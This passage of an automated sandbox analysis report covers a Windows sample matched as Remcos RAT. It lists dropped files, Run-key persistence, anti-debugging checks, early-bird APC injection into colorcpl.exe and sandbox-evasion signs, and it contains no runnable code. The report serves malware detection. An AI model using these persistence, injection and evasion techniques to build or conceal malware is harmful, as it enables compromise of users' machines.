                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B86740 push 02B86782h; ret 0_2_02B8677A
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B8C4F4 push ecx; mov dword ptr [esp], edx0_2_02B8C4F9
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9E5B4 push ecx; mov dword ptr [esp], edx0_2_02B9E5B9
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B8CB74 push 02B8CCFAh; ret 0_2_02B8CCF2
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B8CB56 push 02B8CCFAh; ret 0_2_02B8CCF2
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B968D0 push 02B9697Bh; ret 0_2_02B96973
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B968CE push 02B9697Bh; ret 0_2_02B96973
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9A920 push 02B9A958h; ret 0_2_02B9A950
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B98918 push 02B98950h; ret 0_2_02B98948
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9A91F push 02B9A958h; ret 0_2_02B9A950
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B98916 push 02B98950h; ret 0_2_02B98948
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B92EE8 push 02B92F5Eh; ret 0_2_02B92F56
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B92FF3 push 02B93041h; ret 0_2_02B93039
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B92FF4 push 02B93041h; ret 0_2_02B93039
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B832FC push eax; ret 0_2_02B83338
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B8D528 push 02B8D554h; ret 0_2_02B8D54C
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02BABB6C push 02BABD94h; ret 0_2_02BABD8C
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B97894 push 02B97911h; ret 0_2_02B97909
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C35872 push ecx; ret 0_2_02C35885
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B95E04 push ecx; mov dword ptr [esp], edx0_2_02B95E06
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030E42E6 push ecx; ret 5_2_030E42F9

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeFile created: C:\Users\Public\Libraries\Emxwenem.PIFJump to dropped file
                Sample is not signed and drops a device driver
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030963C6 ShellExecuteW,URLDownloadToFileW,5_2_030963C6
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeFile created: C:\Users\Public\Libraries\Emxwenem.PIFJump to dropped file
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A8A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_030A8A00
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EmxwenemJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EmxwenemJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02B9A95C
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Allocates many large memory junks
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2C30000 memory commit 500006912Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2C31000 memory commit 500178944Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2C5C000 memory commit 500002816Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2C5D000 memory commit 500199424Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2C8E000 memory commit 501014528Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2D86000 memory commit 500006912Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2D88000 memory commit 500015104Jump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeMemory allocated: 2B80000 memory commit 500006912Jump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeMemory allocated: 2B81000 memory commit 500178944Jump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeMemory allocated: 2BAC000 memory commit 500002816Jump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeMemory allocated: 2BAD000 memory commit 500199424Jump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeMemory allocated: 2BDE000 memory commit 501014528Jump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeMemory allocated: 2CD6000 memory commit 500006912Jump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeMemory allocated: 2CD8000 memory commit 500015104Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2BF0000 memory commit 500006912Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2BF1000 memory commit 500178944Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2C1C000 memory commit 500002816Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2C1D000 memory commit 500199424Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2C4E000 memory commit 501014528Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2D46000 memory commit 500006912Jump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: 2D48000 memory commit 500015104Jump to behavior
                Delayed program exit found
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309E18D Sleep,ExitProcess,5_2_0309E18D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299E18D Sleep,ExitProcess,10_2_0299E18D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_030A86FE
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_2_029A86FE
                Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 5127Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 4490Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: foregroundWindowGot 1753Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 4.8 %
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7944Thread sleep count: 154 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7944Thread sleep time: -77000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7948Thread sleep count: 5127 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7948Thread sleep time: -15381000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7948Thread sleep count: 4490 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7948Thread sleep time: -13470000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B858B4
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_0309838E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0309B28E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030AA01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_030AA01B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030987A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_030987A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030DBA59 FindFirstFileExA,5_2_030DBA59
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0309AA71
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A7AAB FindFirstFileW,FindNextFileW,FindNextFileW,5_2_030A7AAB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_03097848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_03097848
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030968CD FindFirstFileW,FindNextFileW,5_2_030968CD
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0309AC78
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0299B28E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0299838E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029AA01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_029AA01B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029987A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_029987A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029A7AAB FindFirstFileW,FindNextFileW,FindNextFileW,10_2_029A7AAB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029DBA59 FindFirstFileExA,10_2_029DBA59
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0299AA71
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029968CD FindFirstFileW,FindNextFileW,10_2_029968CD
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_02997848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_02997848
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0299AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0299AC78
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_03096D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_03096D28
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.00000000005BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.000000000060A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755615191.000000003121C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.3812820641.000000003121C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.1465318188.000000003121C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755366865.000000003121C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Emxwenem.PIF, 00000007.00000002.1527852577.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000002.1609172246.000000000077E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeAPI call chain: ExitProcess graph end nodegraph_0-65084
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end nodegraph_5-47048
                Source: C:\Users\Public\Libraries\Emxwenem.PIFAPI call chain: ExitProcess graph end node

                Anti Debugging

                barindex
                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B9EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02B9EBF0
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C27AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_030C27AE
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B987A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B987A0
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C60939 mov eax, dword ptr fs:[00000030h]0_2_02C60939
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C21D41 mov eax, dword ptr fs:[00000030h]0_2_02C21D41
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030D07B5 mov eax, dword ptr fs:[00000030h]5_2_030D07B5
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029D07B5 mov eax, dword ptr fs:[00000030h]10_2_029D07B5
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A0763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,5_2_030A0763
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C27AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_030C27AE
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C98AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_030C98AC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C28FC SetUnhandledExceptionFilter,5_2_030C28FC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030C2D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_030C2D5C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C27AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_029C27AE
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C98AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_029C98AC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C28FC SetUnhandledExceptionFilter,10_2_029C28FC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_029C2D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_029C2D5C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Early bird code injection technique detected
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 3090000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2990000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2C00000 protect: page execute and read and writeJump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeThread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe5_2_030A0B5C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe10_2_029A0B5C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A75E1 mouse_event,5_2_030A75E1
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                Source: colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerX7\
                Source: colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: colorcpl.exe, 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager!
                Source: colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                Source: colorcpl.exe, 00000005.00000003.2755366865.00000000311F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerX7\d
                Source: colorcpl.exe, 00000005.00000002.3812685840.0000000031205000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2755715581.0000000031205000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: colorcpl.exe, 00000005.00000002.3812685840.00000000311F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager=
                Source: colorcpl.exe, 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.drBinary or memory string: [Program Manager]
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02C13F66 cpuid 0_2_02C13F66
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B85A78
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: GetLocaleInfoA,0_2_02B8A798
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: GetLocaleInfoA,0_2_02B8A74C
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B85B84
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,5_2_0309E2BB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_030DF216
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_030DF2A3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_030DF130
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_030DF17B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,5_2_030DF723
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_030DF7F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_030DF61C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,5_2_030DF4F3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_030D5914
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,5_2_030D5E1C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_030DEEB8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,10_2_0299E2BB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_029DF2A3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,10_2_029DF216
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,10_2_029DF130
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,10_2_029DF17B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_029DF61C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_029DF7F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,10_2_029DF723
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,10_2_029DF4F3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,10_2_029D5914
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_2_029DEEB8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,10_2_029D5E1C
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_02C35A78
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: GetLocaleInfoA,11_2_02C3A798
                Source: C:\Users\Public\Libraries\Emxwenem.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_02C35B83
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B89194 GetLocalTime,0_2_02B89194
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030A95F8 GetComputerNameExW,GetUserNameW,5_2_030A95F8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030D66BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,5_2_030D66BF
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B8B714 GetVersionExA,0_2_02B8B714
                Source: C:\Windows\SysWOW64\colorcpl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812571420.00000000311A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1526792578.0000000000758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.2755366865.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
